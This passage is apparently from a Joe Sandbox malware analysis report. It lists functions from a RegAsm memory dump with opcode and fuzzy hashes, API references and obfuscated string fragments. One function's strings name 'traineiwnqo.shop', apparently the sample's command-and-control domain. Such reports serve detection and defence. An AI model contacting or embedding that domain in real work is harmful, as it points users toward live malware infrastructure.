            • Instruction Fuzzy Hash: 8FF01220508292C9E7118F1A9050771FFB0AF63341B6860C798C56F293C36DDD97D669
            Function 00406B80 Relevance: .4, Instructions: 424COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: db54d59c192d6b6fd14885a93f852d71f41e26016e9a19521493280c03582cbb
            • Instruction ID: dfef78953d44d306f3fabf23c5bb7017981e2830edf013e639bb80511372e877
            • Opcode Fuzzy Hash: db54d59c192d6b6fd14885a93f852d71f41e26016e9a19521493280c03582cbb
            • Instruction Fuzzy Hash: 8AF1BE716083418FC728CF29C881A2BFBE2EF95304F04892DE5D657791E275E954CB9A
            Function 00436E10 Relevance: .3, Instructions: 317COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9d516b691b263f34783574b8d10e145400edb1a21f96742117e16c68cd1ed561
            • Instruction ID: 05e9d15e69f6221528390f51f9169826248a77df80b4759cd4aa61dd3306ed9b
            • Opcode Fuzzy Hash: 9d516b691b263f34783574b8d10e145400edb1a21f96742117e16c68cd1ed561
            • Instruction Fuzzy Hash: 82A1F1756083029BC728DF18D88092BB3F2FF89754F15992DE8858B361E739EC51CB96
            Function 0041FA7F Relevance: .2, Instructions: 243COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 83404a13c3c957f63282f6e511ac123ad5cbcdb76db1fccb295810a29c6b1e7a
            • Instruction ID: df0cd31c607533a98da9c19a4674afab0b99463390f81520ac9175c70ea4b2e2
            • Opcode Fuzzy Hash: 83404a13c3c957f63282f6e511ac123ad5cbcdb76db1fccb295810a29c6b1e7a
            • Instruction Fuzzy Hash: A581ABB490022A8BDB14CF54C8A07BFB7B1FF56304F144A5DD8562B795E3386946CBA8
            Function 0040EDDF Relevance: .2, Instructions: 236COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c4340e28113e2f416eac9606e51f57f28b22c221dfb8cca225654b0e3f015c99
            • Instruction ID: d80a1476e36663fc0f1e44782cbadfce23121eedbcbac17c6fe514ae84ba342f
            • Opcode Fuzzy Hash: c4340e28113e2f416eac9606e51f57f28b22c221dfb8cca225654b0e3f015c99
            • Instruction Fuzzy Hash: A271A4B19083518BD725CF24C48076BB7E5AF96324F140D3EE889A73D1D735E888C79A
            Function 0041C219 Relevance: .1, Instructions: 133COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2580786246c3d70e228bd320d61a6e399c2246324a796232639fc0e6287388a9
            • Instruction ID: 6fb870906a14a99ae7522ebce49e0dce1299c4cad0614e065919b308ab25f387
            • Opcode Fuzzy Hash: 2580786246c3d70e228bd320d61a6e399c2246324a796232639fc0e6287388a9
            • Instruction Fuzzy Hash: D341E7729583928FD710AF58C8C039BBBE1EB96340F19492EE4C597341D378D885C7DA
            Function 00436250 Relevance: .1, Instructions: 85COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1fdb1793cd73c7b7f0bc918e7d4c72ca26648cb6ca977c2709b6ccd04db6e54b
            • Instruction ID: b78f1c056aa8a07ff43ace1c20bbe993874da313b6e81b065cc51acc4efad157
            • Opcode Fuzzy Hash: 1fdb1793cd73c7b7f0bc918e7d4c72ca26648cb6ca977c2709b6ccd04db6e54b
            • Instruction Fuzzy Hash: 3121EF74A08302ABD714DF04C880A6FB7E2FFC9754F15D82EE8944B251D738ED418B9A
            Function 00429A30 Relevance: .1, Instructions: 64COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
            • Instruction ID: 1a79eac26aafbfa0544ef3d7ab2b42f3791513668a3b9443077eb0652731c0b6
            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
            • Instruction Fuzzy Hash: 9711A933B052F40EC3168D3C94105A5BFA31AE3635F9943DAF4B99B3D2D6268D8A8359
            Function 00420120 Relevance: .1, Instructions: 63COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1d78475d16ca2dbc92dfad9f182ff1db781027909e5738ff1e453e2f1f223716
            • Instruction ID: d3e7e8a303244157a839e7ca479edec190b5416b95b20cc82094d503180c8648
            • Opcode Fuzzy Hash: 1d78475d16ca2dbc92dfad9f182ff1db781027909e5738ff1e453e2f1f223716
            • Instruction Fuzzy Hash: 1C019EB1B0131157F6219E51A8C173BB2E8AB84718F48013EE8085B343DB7EEC25C299
            Function 00412BC0 Relevance: .0, Instructions: 38COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8f82cd91b960163e0e5808135f27fbf829c94ba9cad26be72ed03aca08fe522e
            • Instruction ID: 88c506306284b6f53fae94f60c5ac28e1cc24ce12ec5c0cbe14b4f17907f8af3
            • Opcode Fuzzy Hash: 8f82cd91b960163e0e5808135f27fbf829c94ba9cad26be72ed03aca08fe522e
            • Instruction Fuzzy Hash: D1F05CB560811057DB228D589CC1FBBFB9CCB97314F090426E945D7202E1B55884C3EE
            Function 004309A0 Relevance: .0, Instructions: 21COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
            • Instruction ID: 795788ef56b96c1a87959a2f12f052f92192ccaa2abbeab3ace1170b05378ed5
            • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
            • Instruction Fuzzy Hash: 4AD05B61608361466B648D199410577F7E0EEC7711F45555FF582D3245D634DC41C1AD
            Function 00432080 Relevance: .0, Instructions: 15COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4ecffa9da22ecf8f0cb7484af7bb187de05e3d893e8e2e4297bd0606ccac6e2b
            • Instruction ID: 19f27002de139311d532cdf0a5dadcc30a617ca7306e28bf39ffa9b0c1a24fda
            • Opcode Fuzzy Hash: 4ecffa9da22ecf8f0cb7484af7bb187de05e3d893e8e2e4297bd0606ccac6e2b
            • Instruction Fuzzy Hash: 45D092608082859BD3059F54C959E27BBB8EF87318F45A99CE4882B661D234E948C7AA
            Function 00427B1F Relevance: 38.7, APIs: 1, Strings: 21, Instructions: 157memoryCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocString
            • String ID: -$.$/$0$1$3$7$E$F$I$M$N$Q$X$Z$\$]$_$g$i$t
            • API String ID: 2525500382-3840792241
            • Opcode ID: 34b2002c33908cdc904edf0693c871045e4e1a09d1ed9e193f0e3319d6412fd4
            • Instruction ID: 96cb5398d84af92d0af91690a551596a32e8875e404a3310b4c7eb945ff85e54
            • Opcode Fuzzy Hash: 34b2002c33908cdc904edf0693c871045e4e1a09d1ed9e193f0e3319d6412fd4
            • Instruction Fuzzy Hash: A7A1727050CBC28AD3368A3C98487DABFD15BA7324F084B9DE5E94A2E2D3B44546C767
            Function 00427599 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 79COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: !$#$%$'$)$+$-$/$9$=$?$n$q
            • API String ID: 2610073882-1071266462
            • Opcode ID: a0bbf188bdef0a021ef6c17e298bd608ef58975ad04b6650471343fbb64cca1d
            • Instruction ID: 2809399181118501a9d804626b5b8a9a88b760e87ec92ab85ba5d1495bfd0bba
            • Opcode Fuzzy Hash: a0bbf188bdef0a021ef6c17e298bd608ef58975ad04b6650471343fbb64cca1d
            • Instruction Fuzzy Hash: C441F37010C3C19ED362DB28D09875EBFE0ABA6318F881A9DF4D44B392C7798549CB93
            Function 0042695F Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 72COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: !$#$%$'$)$+$-$/$9$=$?$n$q
            • API String ID: 2610073882-1071266462
            • Opcode ID: b050d201fb3290e6e6b82bd017bf639e88d3ab13b1b3fa132c52f229ea72cb07
            • Instruction ID: 3460601eeb3e64c44eac0f1af0712e4cb2a5fd897327b2d52351aa9d80f2f269
            • Opcode Fuzzy Hash: b050d201fb3290e6e6b82bd017bf639e88d3ab13b1b3fa132c52f229ea72cb07
            • Instruction Fuzzy Hash: D441C27010C3C19ED361DB28908875EBFE0ABA6314F845E9DF4E44B392C7798549CB63
            Function 00428ECF Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 95COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: %$'$1$1$3$5$7$9$?$@$D$H
            • API String ID: 1927566239-2802390439
            • Opcode ID: 522683a62472983370d838072ed5bcca0a8f4d7babe56d03a5ab104262c1bbc1
            • Instruction ID: 45a4f18320d1b374e85e82b86ab003bac34e5c63c7b4f03164d8d86de9c35e8d
            • Opcode Fuzzy Hash: 522683a62472983370d838072ed5bcca0a8f4d7babe56d03a5ab104262c1bbc1
            • Instruction Fuzzy Hash: B74118701087818ED726CF28D498706BFE0AB16314F088A9DD8EA4F797C774D605CBA6
            Function 00429598 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 89COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: %$'$1$1$3$5$7$9$?$@$D$H
            • API String ID: 1927566239-2802390439
            • Opcode ID: b401b783ec908f1c5b13f858e93dc00dfab92e8e84abc02dea9cca9571f97b2a
            • Instruction ID: 836341f980cf8c7e8d8bb1d143024b3cf0fae830d99e5b6c14b5719918d84301
            • Opcode Fuzzy Hash: b401b783ec908f1c5b13f858e93dc00dfab92e8e84abc02dea9cca9571f97b2a
            • Instruction Fuzzy Hash: B141E9601087C18ED726CF2CD488716BFE06B16214F488A9ED8E54F7D7C375DA1ACB66
            Function 00426B11 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 68COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: !$i$k$m$o$q$s$u$v$w
            • API String ID: 1927566239-2573421488
            • Opcode ID: 7bfb1cb778c037d1e7ea6437ed2e33705a16be6bfd0bbb20899df837543afbbc
            • Instruction ID: e32bc32200d3b0052710997c4ff78e635987ec48b79412ec1e14b6228f1f78ad
            • Opcode Fuzzy Hash: 7bfb1cb778c037d1e7ea6437ed2e33705a16be6bfd0bbb20899df837543afbbc
            • Instruction Fuzzy Hash: 9431B27050C3C18AD321DB28D05879FBFE0AB95348F048C5EE4CA97392D7BA9548DB63
            Function 00419B90 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 402COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: BZ$JB$SY$VU$[M$yI$ys
            • API String ID: 0-2800861462
            • Opcode ID: c9f966281d422041fb9d01f3208fd165648449c003dda886f376f597bafa99d2
            • Instruction ID: 3aaf0c5e9ddac422a64c62ed6f7a23188ae074809220aa233d952046406d6e5b
            • Opcode Fuzzy Hash: c9f966281d422041fb9d01f3208fd165648449c003dda886f376f597bafa99d2
            • Instruction Fuzzy Hash: A5F11DB41083819BD314DF59D990A2BBBF0EF96788F144A1DF0D98B361D3389945CB9B
            Function 00426CDB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: T$V$W$X
            • API String ID: 2610073882-3009632173
            • Opcode ID: 2f494ea275f35900c4a1c140c65cd30844daf452493bcb390bd471df32c0bab5
            • Instruction ID: 84965b94688c73dd34a0a381efb57dc1b8c7603a6d9b763ee15bafcd77ae8945
            • Opcode Fuzzy Hash: 2f494ea275f35900c4a1c140c65cd30844daf452493bcb390bd471df32c0bab5
            • Instruction Fuzzy Hash: D451906010C7C18ED3319B3C995879BBFE1ABA7224F184B9DE4E94B2E2C7309545CB67
            Function 0040CE00 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 338COMMON
            Download Yara Rule
            APIs
            • GetSystemDirectoryW.KERNEL32(37C539E7,00000104), ref: 0040D27A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: DirectorySystem
            • String ID: <?$traineiwnqo.shop
            • API String ID: 2188284642-920402337
            • Opcode ID: 376000f2929f4b1e897b819b7ab8830530c2ca87bc9560ba9dd1e5f503588ffc
            • Instruction ID: cb79f9d119bbcc5c349f596b6c01ce667fb9f8ab358c849ab24bbad4e6a1ae48
            • Opcode Fuzzy Hash: 376000f2929f4b1e897b819b7ab8830530c2ca87bc9560ba9dd1e5f503588ffc
            • Instruction Fuzzy Hash: B8C167B150D3C18BD3708F25948479BBBE6FF86344F144A6DE8C86B291CB389945CB97
            Function 00427F8E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: String
            • String ID: R$U
            • API String ID: 2568140703-2056283921
            • Opcode ID: 4d9f655a98abdddcf411aef1a5eb1dc83f14243dad9d5230978017d9c63cd6c4
            • Instruction ID: facaef09d57fc36e8301dcc93150ffe9bfd6ed82364c7e9ff28dd0fcde9fab3a
            • Opcode Fuzzy Hash: 4d9f655a98abdddcf411aef1a5eb1dc83f14243dad9d5230978017d9c63cd6c4
            • Instruction Fuzzy Hash: F341497120D3808FC7349B68D4903AEFBE1AFD6320F554A2EE5E997381CA388845CB17